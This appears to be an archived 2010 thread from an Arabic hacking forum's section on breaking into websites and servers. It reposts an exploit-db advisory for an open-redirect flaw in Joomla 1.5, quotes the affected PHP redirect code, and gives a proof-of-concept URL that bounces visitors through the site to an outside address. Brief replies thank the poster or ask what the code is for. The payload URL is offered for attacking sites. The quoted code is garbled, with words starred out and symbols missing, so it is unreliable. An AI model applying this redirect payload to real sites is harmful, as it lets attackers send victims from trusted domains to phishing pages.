:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   ثغرة جديدة Joomla 1.5 URL Redirecting Vulnerability (http://www.vbspiders.com/vb/showthread.php?t=35519)

Tn-Sn!PeR 08-24-2010 03:58 PM

ثغرة جديدة Joomla 1.5 URL Redirecting Vulnerability
 
[align=center]
كود PHP:

============================================
Joomla!   (Multiple) ExploiT

============================================

#  Powered  Joomla! 1.5 & All version Down  (Multiple)
 
 
# Author: Mr.MLL
# Published: 2010-08-24
# Verified: yes
# Download Exploit Code
# Download N/A
 
===
 
 
# Software :  http://www.joomla.org/download.html
# Vendor   :  http://www.joomla.org/
# Contact  :  Y-3@hotmail.com
 
===


<?php
    
}

    if ( 
$return && !( strpos$return'com_registration' ) || strpos$return'com_login' ) ) ) {
    
// checks for the presence of a return url
    // and ensures that this url is not the registration or login pages
        // If a session****** exists, redirect to the given page. Otherwise, take an extra round for a ******check
        
if (isset( $_******[mosMainFrame::session******Name()] )) {
            
mosRedirect$return );
        } else {
            
mosRedirect$mosConfig_live_site .'/index.php?option=******check&return=' urlencode$return ) );
        }
    } else {
        
// If a session****** exists, redirect to the start page. Otherwise, take an extra round for a ******check
        
if (isset( $_******[mosMainFrame::session******Name()] )) {
            
mosRedirect$mosConfig_live_site .'/index.php' );
        } else {
            
mosRedirect$mosConfig_live_site .'/index.php?option=******check&return=' urlencode$mosConfig_live_site .'/index.php' ) );
        }
    }

} else if (
$option == 'logout') {
    
$mainframe->logout();

    
// JS Popup message
    
if ( $message ) {
        
?>

=========
# ExploiT
 
    http://127.0.0.1/path/index.php?option=******check&return=http://Google.com/
 
 
=========

# Thanks : milw0rm.com & exploit-db.com  & offsec.com & inj3ct0r.com & www.hack0wn.com

exit ,, / Praise be to God for the blessing of Islam

[/align]

http://www.exploit-db.com/exploits/14722/

KaLa$nikoV 08-24-2010 04:32 PM

شكرا لك ع الموضوع


ان شاء الله تكون قويه :]

hitman-zone 08-24-2010 05:07 PM

thanks

عنكوب 08-25-2010 05:47 PM

[align=center]عفوا ghassensaada
أنا مش فاهم الموضوع !
يعني ايش بدنا نعمل بالكود ، ؟؟!

هل هو طريقة فعلا جديدة لاختراق آخر اصدارات جملا! ؟[/align]


الساعة الآن 07:47 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0